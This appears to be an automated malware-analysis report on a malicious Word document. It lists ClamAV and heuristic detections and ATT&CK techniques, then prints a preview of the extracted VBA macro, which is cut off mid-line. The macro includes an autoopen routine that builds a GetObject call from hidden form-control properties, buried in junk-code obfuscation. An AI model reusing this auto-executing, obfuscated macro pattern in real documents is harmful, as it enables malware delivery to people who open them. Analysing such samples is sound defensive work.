Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros, including an AutoOpen macro and GetObject calls. The presence of VBA code suggests an attempt to execute arbitrary code, likely to download and run a secondary payload. The document's structure and macro execution point towards a spearphishing attachment delivery method.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6931473-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6931473-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28098 bytes |

SHA-256 of macros.bas: 2cc12f600c5b55a0627bb62fe27a75bff9c13ac2884fc6204e21b392ab932a7c
Preview script: first 1,000 lines of the extracted script.

```vb
Attribute VB_Name = "qDAZBA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dQGAAXAx"
Attribute VB_Base = "0{831114E8-1BEE-475A-A30D-4E41E7BFB6FB}{9B3E3F9B-8D90-46EA-A146-D8006D2BE68B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "OGAAZ1UD"
Attribute VB_Base = "0{E8350667-3B50-4C9F-B57A-8401A0B47C81}{1A50BD04-63DA-4257-B45D-193D975D982C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MDDkAC"
Function HAAkDGc()
If 234793173 = 955128722 Then
For sABD1xA = HAAQAAA_ To XBQQAA
LwXGAA _
= 590788580 / Rnd(awGAAXQU) + 686524228 * _
CStr(UxAoAoUC) * 69788149 - Oct(524980210 * _
Fix(857532658) / 459805826 + Int(kAG_BAXA)) _
- NAAUDx + 819909122 - 39922484 + 734924491 - (KZADAAAx - 350500046)
Next
End If
If 838535891 = 308542598 Then
For PAZAAA = sAAoXx To dXCc1cD
NoDkAA _
= 607585464 / Rnd(tk4AkC) + 591834109 * _
CStr(B_xBwZD) * 612392643 - Oct(662243143 * _
Fix(363155519) / 729679268 + Int(wBDUDx)) _
- cXAkAGA + 414496952 - 59547387 + 997231206 - (RA_wAAB - 31807346)
Next
End If
If 615641498 = 971733395 Then
For kAUAwAAC = vcDDAoA To zAGAU_Q
lZDBAQw _
= 415278270 / Rnd(IQAcBcQ) + 766547606 * _
CStr(aCQDDBDx) * 357129484 - Oct(986053300 * _
Fix(619173463) / 715053212 + Int(MAwABB)) _
- ioDAxADB + 931587625 - 682466297 + 575405209 - (oUxwBAwA - 239044724)
Next
End If
End Function
Sub autoopen()
k4CAUU
End Sub
Function k4CAUU()
On Error Resume Next
If 882376888 = 619571257 Then
For MA1wZA = AQAwoB To w_Gx1kQ_
IUBcCQk _
= 546731093 / Rnd(OZCAwXA4) + 284838484 * _
CStr(kwQAUC4A) * 126094876 - Oct(132822607 * _
Fix(804812243) / 208842423 + Int(VUAAwkAc)) _
- VZDAkDAX + 964357706 - 662064978 + 454073096 - (LQ4ZAA - 613485824)
Next
End If
If 989143074 = 878505632 Then
For iACXQoA = aAGUZ1 To OCQAAAAZ
HXBcDQ _
= 555217259 / Rnd(rXQQDD) + 286200540 * _
CStr(lxDUA4UA) * 90769262 - Oct(195948124 * _
Fix(927750395) / 922434016 + Int(cA1AZQAk)) _
- BGGAAXA + 366949174 - 253224676 + 73240808 - (CACCAA - 444338928)
Next
End If
Set EGXwoA = GetObject(dQGAAXAx.RBCAxDoB.ControlSource + OGAAZ1UD.IADBAA1x + dQGAAXAx.RBCAxDoB.ControlTipText)
If 404351976 = 864257624 Then
For OoUoQ_A = dBw1AQD To ZwXBZQ
fAQAkDA _
= 125456284 / Rnd(fA4GUA) + 251774005 * _
CStr(iDwAGAAD) * 847533478 - Oct(291762408 * _
Fix(723287923) / 377251810 + Int(uBUDXAXA)) _
- iQA_BZ + 878302991 - 307811842 + 659708720 - (NUcBDQ - 5511155)
Next
End If
If 366230231 = 23927789 Then
For DAAAXA = uUA4AkZ To I_UB4cG
nUDAAA _
= 460946474 / Rnd(kA_AQ1AA) + 88722666 * _
CStr(SQcGAw) * 563469152 - Oct(163245704 * _
Fix(437422444) / 464684878 + Int(qAcBAc)) _
- GA_QAxD + 939410207 - 415686895 + 580904789 - (L1AcAAcC - 341766125)
Next
End If
If 26668 = 26668 Then
If 558906053 = 756399120 Then
For n_xX1wQ = FAXAxU To iDAAkX
GkAo_Ac _
= 666216049 / Rnd(lAAwZQA4) + 315904366 * _
CStr(dAAZAcU) * 544001265 - Oct(531890353 * _
Fix(638258695) / 274411602 + Int(JkoAA1CQ)) _
- jDADoA + 318412963 - 520745769 + 859019735 - (cBAUAB4k - 329483975)
Next
End If
If 825427278 = 717707181 Then
For KAxAAQAQ = zA_DAoB To oDAUAD
cUCZD1B _
= 39107371 / Rnd(JABAckQA) + 792787418 * _
CStr(pAZAZQG) * 453410141 - Oct(487295443 * _
Fix(197935780) / 791546417 + Int(pUwA4A)) _
- LxDGUA + 104465988 - 621382070 + 891863162 - (RQAAAGo - 51098945
```

... (truncated)